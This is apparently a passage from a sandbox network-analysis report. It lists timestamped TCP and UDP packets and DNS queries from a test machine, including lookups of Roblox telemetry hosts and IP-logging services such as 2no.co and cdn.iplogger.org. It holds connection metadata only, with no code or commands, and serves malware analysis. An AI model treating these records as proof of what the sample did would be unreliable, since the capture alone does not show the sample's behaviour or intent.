                                                                            Jul 30, 2024 00:56:53.441629887 CEST49747443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:53.441643953 CEST44349747172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:53.453757048 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:53.453810930 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:53.453962088 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:53.455034018 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:53.455046892 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:53.475647926 CEST4434974588.212.201.198192.168.2.6
                                                                            Jul 30, 2024 00:56:53.475722075 CEST4434974588.212.201.198192.168.2.6
                                                                            Jul 30, 2024 00:56:53.475862026 CEST49745443192.168.2.688.212.201.198
                                                                            Jul 30, 2024 00:56:53.477168083 CEST49745443192.168.2.688.212.201.198
                                                                            Jul 30, 2024 00:56:53.477185965 CEST4434974588.212.201.198192.168.2.6
                                                                            Jul 30, 2024 00:56:53.489523888 CEST49747443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:53.536495924 CEST44349746142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:56:53.536561966 CEST49746443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:56:53.547614098 CEST44349747172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:53.547669888 CEST44349747172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:53.547714949 CEST44349747172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:53.547772884 CEST44349747172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:53.547794104 CEST49747443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:53.547899008 CEST49747443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:53.548808098 CEST49747443192.168.2.6172.67.132.113
                                                                            Jul 30, 2024 00:56:53.548825979 CEST44349747172.67.132.113192.168.2.6
                                                                            Jul 30, 2024 00:56:54.167462111 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.167558908 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.177174091 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.177187920 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.177534103 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.223510981 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.268507004 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.471956015 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.472012043 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.472110987 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.472203016 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.472219944 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.472243071 CEST49748443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.472249031 CEST4434974823.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.516036987 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.516067982 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:54.516148090 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.516427994 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:54.516442060 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:55.186089039 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:55.186321020 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:55.188678026 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:55.188687086 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:55.189075947 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:55.191690922 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:55.232500076 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:55.472949982 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:55.473123074 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:55.477664948 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:55.564567089 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:55.564599991 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:55.564613104 CEST49749443192.168.2.623.32.185.164
                                                                            Jul 30, 2024 00:56:55.564620018 CEST4434974923.32.185.164192.168.2.6
                                                                            Jul 30, 2024 00:56:56.752614975 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:56.752645016 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:56.752769947 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:56.753621101 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:56.753634930 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:57.606822014 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:57.607052088 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:57.610641003 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:57.610661983 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:57.611268997 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:57.613611937 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:57.613800049 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:57.613811970 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:57.613945007 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:57.656495094 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:57.814050913 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:57.814166069 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:56:57.814362049 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:57.814616919 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:57.814616919 CEST49750443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:56:57.814640999 CEST4434975040.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:03.443037033 CEST44349746142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:03.443109989 CEST44349746142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:03.443260908 CEST49746443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:04.066725016 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:57:04.066812038 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:57:04.066857100 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:57:05.141479015 CEST49721443192.168.2.6104.21.79.229
                                                                            Jul 30, 2024 00:57:05.141519070 CEST44349721104.21.79.229192.168.2.6
                                                                            Jul 30, 2024 00:57:05.141577005 CEST49746443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:05.141632080 CEST44349746142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:16.949985981 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:16.950088024 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:16.950239897 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:16.964029074 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:16.964065075 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:17.803046942 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:17.803266048 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:17.805610895 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:17.805643082 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:17.805965900 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:17.808310986 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:17.808384895 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:17.808398008 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:17.808521986 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:17.856503963 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:17.993268967 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:17.993360996 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:17.993443966 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:17.993725061 CEST49751443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:17.993769884 CEST4434975140.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:26.609961033 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:26.610064983 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:26.610194921 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:26.610702991 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:26.610742092 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.618172884 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.618278980 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.622320890 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.622359037 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.622685909 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.635925055 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.676500082 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.838368893 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.838399887 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.838417053 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.838582039 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.838649035 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.838684082 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.838712931 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.842300892 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.842345953 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.842396021 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.842406988 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.842420101 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.842420101 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.842673063 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.844537973 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.844567060 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:27.844597101 CEST49753443192.168.2.620.12.23.50
                                                                            Jul 30, 2024 00:57:27.844602108 CEST4434975320.12.23.50192.168.2.6
                                                                            Jul 30, 2024 00:57:44.685390949 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:44.685431004 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:44.685514927 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:44.689668894 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:44.689682961 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.538291931 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.538465977 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.541152954 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.541160107 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.541405916 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.543879032 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.543951988 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.543960094 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.544146061 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.584496975 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.727072001 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.727410078 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:45.727564096 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.727880001 CEST49754443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:57:45.727900982 CEST4434975440.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:57:52.681859016 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:52.681915998 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:52.682152987 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:52.682431936 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:52.682442904 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.339844942 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.340281010 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:53.340306044 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.340651989 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.341042995 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:53.341110945 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:57:53.384718895 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:57:57.009581089 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:57:57.025928974 CEST53587861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.026488066 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:57:57.026488066 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:57:57.042280912 CEST53587861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.513586998 CEST53587861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.514988899 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:57:57.539103985 CEST53587861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.539159060 CEST5878653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:58:03.251549006 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:58:03.251616001 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:58:03.251777887 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:58:05.154359102 CEST49758443192.168.2.6142.250.186.100
                                                                            Jul 30, 2024 00:58:05.154386997 CEST44349758142.250.186.100192.168.2.6
                                                                            Jul 30, 2024 00:58:17.732601881 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:17.732647896 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:17.732717037 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:17.733367920 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:17.733386040 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.572107077 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.572216034 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.579072952 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.579097986 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.579298973 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.581891060 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.581995964 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.582007885 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.582351923 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.628498077 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.766479969 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.766566992 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:58:18.766618967 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.766850948 CEST58795443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:58:18.766875029 CEST4435879540.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.122247934 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.122313023 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.122581959 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.123147964 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.123168945 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.954035997 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.956083059 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.956470966 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.956492901 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.957078934 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:09.961766005 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.961766005 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.961766005 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:09.961786032 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:10.008497000 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:10.145749092 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:10.145991087 CEST4435879740.113.110.67192.168.2.6
                                                                            Jul 30, 2024 00:59:10.146059990 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:10.146245956 CEST58797443192.168.2.640.113.110.67
                                                                            Jul 30, 2024 00:59:16.563091040 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:16.563132048 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:16.563235044 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:16.565164089 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:16.565176010 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.331162930 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.332058907 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:17.332113981 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.333882093 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.333955050 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:17.335726976 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:17.335928917 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:17.335936069 CEST4435880113.32.110.82192.168.2.6
                                                                            Jul 30, 2024 00:59:17.336030960 CEST58801443192.168.2.613.32.110.82
                                                                            Jul 30, 2024 00:59:19.899090052 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:19.899132967 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:19.900010109 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:19.901248932 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:19.901266098 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:20.686125994 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:20.686938047 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:20.686960936 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:20.688011885 CEST44358804128.116.21.4192.168.2.6
                                                                            Jul 30, 2024 00:59:20.688069105 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:20.690402031 CEST58804443192.168.2.6128.116.21.4
                                                                            Jul 30, 2024 00:59:20.690558910 CEST58804443192.168.2.6128.116.21.4

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 30, 2024 00:56:33.361526012 CEST5125653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:33.379079103 CEST53512561.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:34.127734900 CEST5891853192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:34.146291971 CEST53589181.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:35.067919970 CEST6534153192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:48.308696032 CEST5151853192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:48.308979988 CEST5311553192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:48.429425001 CEST53650731.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:48.429920912 CEST53597151.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:48.432893038 CEST53531151.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:48.434175014 CEST53515181.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.704432964 CEST6421353192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:49.704626083 CEST6175953192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:49.724371910 CEST53642131.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.724828005 CEST53617591.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.730747938 CEST5902653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:49.731116056 CEST5190553192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:49.748725891 CEST53590261.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.748974085 CEST53519051.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:49.775507927 CEST53559601.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.369602919 CEST6434453192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:50.369925976 CEST5264853192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:50.388063908 CEST53643441.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:50.388122082 CEST53526481.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.184640884 CEST6239753192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.184813976 CEST6018653192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.202683926 CEST53601861.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.202953100 CEST53623971.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.630474091 CEST6235553192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.631124020 CEST6022353192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.648118019 CEST53623551.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.648458958 CEST53602231.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.874556065 CEST6546853192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.874861002 CEST6229253192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:56:52.893346071 CEST53654681.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:56:52.895145893 CEST53622921.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:06.691802979 CEST53586801.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:25.640033960 CEST53569741.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:47.858498096 CEST53519221.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:48.175936937 CEST53569151.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:57:57.008881092 CEST53571551.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:58:07.593827009 CEST5707753192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:59:10.476824999 CEST53537031.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:59:16.543349028 CEST5060053192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:59:16.561095953 CEST53506001.1.1.1192.168.2.6
                                                                            Jul 30, 2024 00:59:19.864056110 CEST5641053192.168.2.61.1.1.1
                                                                            Jul 30, 2024 00:59:19.881989002 CEST53564101.1.1.1192.168.2.6

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jul 30, 2024 00:56:33.361526012 CEST192.168.2.61.1.1.10xa2e1Standard query (0)client-telemetry.roblox.comA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:34.127734900 CEST192.168.2.61.1.1.10x9a3cStandard query (0)ecsv2.roblox.comA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:35.067919970 CEST192.168.2.61.1.1.10xb1a1Standard query (0)clientsettingscdn.roblox.comA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:48.308696032 CEST192.168.2.61.1.1.10x6fb3Standard query (0)2no.coA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:48.308979988 CEST192.168.2.61.1.1.10xd09Standard query (0)2no.co65IN (0x0001)false
                                                                            Jul 30, 2024 00:56:49.704432964 CEST192.168.2.61.1.1.10x51fbStandard query (0)cdn.iplogger.orgA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:49.704626083 CEST192.168.2.61.1.1.10x729bStandard query (0)cdn.iplogger.org65IN (0x0001)false
                                                                            Jul 30, 2024 00:56:49.730747938 CEST192.168.2.61.1.1.10x95bdStandard query (0)counter.yadro.ruA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:49.731116056 CEST192.168.2.61.1.1.10x5d2Standard query (0)counter.yadro.ru65IN (0x0001)false
                                                                            Jul 30, 2024 00:56:50.369602919 CEST192.168.2.61.1.1.10xb3b0Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:50.369925976 CEST192.168.2.61.1.1.10x5816Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.184640884 CEST192.168.2.61.1.1.10x6fe4Standard query (0)counter.yadro.ruA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.184813976 CEST192.168.2.61.1.1.10xa708Standard query (0)counter.yadro.ru65IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.630474091 CEST192.168.2.61.1.1.10x361fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.631124020 CEST192.168.2.61.1.1.10xc7ebStandard query (0)www.google.com65IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.874556065 CEST192.168.2.61.1.1.10x7579Standard query (0)cdn.iplogger.orgA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:56:52.874861002 CEST192.168.2.61.1.1.10x5ef1Standard query (0)cdn.iplogger.org65IN (0x0001)false
                                                                            Jul 30, 2024 00:58:07.593827009 CEST192.168.2.61.1.1.10x207Standard query (0)clientsettingscdn.roblox.comA (IP address)IN (0x0001)false
                                                                            Jul 30, 2024 00:59:16.543349028 CEST192.168.2.61.1.1.10x754eStandard query (0)clientsettingscdn.roblox.comA (IP address)IN (0x0001)false
